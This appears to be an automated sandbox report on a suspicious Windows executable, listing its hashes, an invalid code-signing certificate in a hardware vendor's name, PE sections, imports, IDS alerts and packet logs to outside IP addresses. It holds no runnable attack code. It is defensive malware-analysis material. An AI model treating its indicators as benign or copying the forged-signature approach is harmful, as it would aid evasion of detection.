                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                      File name:3.exe
                                                                      File size:1081696
                                                                      MD5:21f077fa0e739f6174e2452abc30bb7c
                                                                      SHA1:9d60988db53eb662eb6a8e2f824036348f5e7ec0
                                                                      SHA256:6f536ae781fd98358126408aa6991b4bb3ec3f9940929a22b25f785b71ec770d
                                                                      SHA512:33e9b0e9d0f7897aa56c69187f8e797b695e729774afa9f81a23618443cd11911c10777dfc1af6294135c3a16df6b23942c7f8f2ee3fcb3522c4ebe77c9af38e
                                                                      SSDEEP:12288:D1cg+pOHH8f/6xUJ492ctspCbQHA8N44Oo40vqX0uNb+T0HXX+jBnnXLVgKR3mEx:D1BjH8f/6AwbL24Eq/XQBmEsG
                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:b2b89c8eaebafe6a

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x45918c
                                                                      Entrypoint Section:CODE
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:e077016a28329385307019c238609f17

                                                                      Authenticode Signature

                                                                      Signature Valid:false
                                                                      Signature Issuer:CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                      Error Number:-2146869232
                                                                      Not Before, Not After
                                                                      • 2/23/2010 4:00:00 PM 2/24/2011 3:59:59 PM
                                                                      Subject Chain
                                                                      • CN=Ralink Technology Corporation, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Ralink Technology Corporation, L="Hsin-Chu, Taiwan", S=Taiwan, C=TW
                                                                      Version:3
                                                                      Thumbprint MD5:F713EBAED78D8C12DB295D8908F3411E
                                                                      Thumbprint SHA-1:E3143F0DF21FCED02FE5525B297ED4CD389C66E3
                                                                      Thumbprint SHA-256:7C0D94CA9C871E324302C124373A5A00346E3C8206FF4CCC1024EC558F195D7D
                                                                      Serial:54CC50D147FA549E3F721C754E4E3A91

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      add esp, FFFFFFF0h
                                                                      mov eax, 00458F84h
                                                                      call 00007EFDC0BF891Dh
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007EFDC0C476ADh
                                                                      mov ecx, dword ptr [0045B3E4h]
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov edx, dword ptr [004585E8h]
                                                                      call 00007EFDC0C476ADh
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      mov byte ptr [eax+5Bh], 00000000h
                                                                      mov eax, dword ptr [0045B2C8h]
                                                                      mov eax, dword ptr [eax]
                                                                      call 00007EFDC0C47716h
                                                                      call 00007EFDC0BF67E5h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5d0000x218e.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000xa4318.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x106c000x1560.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x663c.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x610000x18.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      CODE0x10000x581dc0x58200False0.528277371454data6.5233234465IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      DATA0x5a0000x14400x1600False0.409268465909data4.02531912918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      BSS0x5c0000xd710x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .idata0x5d0000x218e0x2200False0.367417279412data5.00766448611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .tls0x600000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x610000x180x200False0.05078125data0.160858762351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .reloc0x620000x663c0x6800False0.610314002404data6.63947907273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x690000xa43180xa4400False0.140138948345data5.15891276742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_CURSOR0x69d900x134data
                                                                      RT_CURSOR0x69ec40x134dataEnglishUnited States
                                                                      RT_BITMAP0x69ff80x1d0data
                                                                      RT_BITMAP0x6a1c80x1e4data
                                                                      RT_BITMAP0x6a3ac0x1d0data
                                                                      RT_BITMAP0x6a57c0x1d0data
                                                                      RT_BITMAP0x6a74c0x1d0data
                                                                      RT_BITMAP0x6a91c0x1d0data
                                                                      RT_BITMAP0x6aaec0x1d0data
                                                                      RT_BITMAP0x6acbc0x1d0data
                                                                      RT_BITMAP0x6ae8c0x1d0data
                                                                      RT_BITMAP0x6b05c0x1d0data
                                                                      RT_BITMAP0x6b22c0x128data
                                                                      RT_BITMAP0x6b3540x128data
                                                                      RT_BITMAP0x6b47c0x128data
                                                                      RT_BITMAP0x6b5a40xe8data
                                                                      RT_BITMAP0x6b68c0x128data
                                                                      RT_BITMAP0x6b7b40x128data
                                                                      RT_BITMAP0x6b8dc0xd0data
                                                                      RT_BITMAP0x6b9ac0x128data
                                                                      RT_BITMAP0x6bad40x128data
                                                                      RT_BITMAP0x6bbfc0x128data
                                                                      RT_BITMAP0x6bd240x128data
                                                                      RT_BITMAP0x6be4c0x128data
                                                                      RT_BITMAP0x6bf740xe8data
                                                                      RT_BITMAP0x6c05c0x128data
                                                                      RT_BITMAP0x6c1840x128data
                                                                      RT_BITMAP0x6c2ac0xd0data
                                                                      RT_BITMAP0x6c37c0x128data
                                                                      RT_BITMAP0x6c4a40x128data
                                                                      RT_BITMAP0x6c5cc0x128data
                                                                      RT_BITMAP0x6c6f40x128data
                                                                      RT_BITMAP0x6c81c0x128data
                                                                      RT_BITMAP0x6c9440xe8data
                                                                      RT_BITMAP0x6ca2c0x128data
                                                                      RT_BITMAP0x6cb540x128data
                                                                      RT_BITMAP0x6cc7c0xd0data
                                                                      RT_BITMAP0x6cd4c0x128data
                                                                      RT_BITMAP0x6ce740x128data
                                                                      RT_BITMAP0x6cf9c0xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                      RT_ICON0x6d0840x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                      RT_ICON0x6d4ec0x988dataEnglishUnited States
                                                                      RT_ICON0x6de740x10a8dataEnglishUnited States
                                                                      RT_ICON0x6ef1c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 251658240EnglishUnited States
                                                                      RT_RCDATA0x731440x66dPNG image data, 32 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                      RT_RCDATA0x737b40x10data
                                                                      RT_RCDATA0x737c40x3b080PC bitmap, Windows 3.x format, 314 x 160 x 4EnglishUnited States
                                                                      RT_RCDATA0xae8440x5e77aDelphi compiled form 'TForm2'
                                                                      RT_GROUP_CURSOR0x10cfc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                      RT_GROUP_CURSOR0x10cfd40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_ICON0x10cfe80x3edataEnglishUnited States
                                                                      RT_MANIFEST0x10d0280x2f0XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                      user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                      kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                      advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                      kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                      version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                      gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                      user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                      kernel32.dllSleep
                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                      ole32.dllOleUninitialize
                                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                      comdlg32.dllGetOpenFileNameA

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      06/11/21-12:23:24.887947TCP1201ATTACK-RESPONSES 403 Forbidden804973534.102.136.180192.168.2.3
                                                                      06/11/21-12:23:40.797790TCP1201ATTACK-RESPONSES 403 Forbidden804974234.102.136.180192.168.2.3
                                                                      06/11/21-12:24:22.687731TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.3
                                                                      06/11/21-12:24:27.958566TCP1201ATTACK-RESPONSES 403 Forbidden804975334.102.136.180192.168.2.3

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 11, 2021 12:22:13.680291891 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.722769022 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:13.722882032 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.748159885 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.790473938 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:13.791169882 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:13.791188955 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:13.791258097 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.791299105 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.873188972 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.920049906 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:13.920279026 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:13.920414925 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.940088987 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:13.982587099 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010052919 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010080099 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010096073 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010106087 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010122061 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010138035 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010154009 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010176897 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.010199070 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.010232925 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.010396957 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.010982990 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.011009932 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.011056900 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.011080027 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.012008905 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.012173891 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.012254000 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.012948036 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.012984991 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.013029099 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.013063908 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.013921022 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.013952017 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.014014959 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.014034986 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.014897108 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.014954090 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.014961004 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.015898943 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.015932083 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.015980959 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.016021967 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.016913891 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.017019033 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.017106056 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.017930031 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.017988920 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.018068075 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.018898964 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.018969059 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.019046068 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.019936085 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.020020962 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.020025015 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.020077944 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.020689964 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.020775080 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.020870924 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.020935059 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.020967007 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.021002054 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.021827936 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.021884918 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.021919966 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.021949053 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.022913933 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.023016930 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.024224997 CEST49717443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.052594900 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.052639008 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.052680969 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.052706003 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.053041935 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.053073883 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.053108931 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.053136110 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.053976059 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.054016113 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.054089069 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.054110050 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.055023909 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.055058002 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.055107117 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.055139065 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.055983067 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.056016922 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.056081057 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.056967020 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.057019949 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.057065010 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.057091951 CEST49716443192.168.2.3162.159.135.233
                                                                      Jun 11, 2021 12:22:14.057977915 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.058013916 CEST44349716162.159.135.233192.168.2.3
                                                                      Jun 11, 2021 12:22:14.058090925 CEST49716443192.168.2.3162.159.135.233

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 11, 2021 12:22:01.003562927 CEST6511053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:01.065393925 CEST53651108.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:02.168694973 CEST5836153192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:02.218684912 CEST53583618.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:03.227401018 CEST6349253192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:03.281610012 CEST53634928.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:04.283823013 CEST6083153192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:04.336616039 CEST53608318.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:05.257834911 CEST6010053192.168.2.38.8.8.8
                                                                      Jun 11, 2021 12:22:05.318967104 CEST53601008.8.8.8192.168.2.3
                                                                      Jun 11, 2021 12:22:06.190840960 CEST5319553192.168.2.38.8.8.8
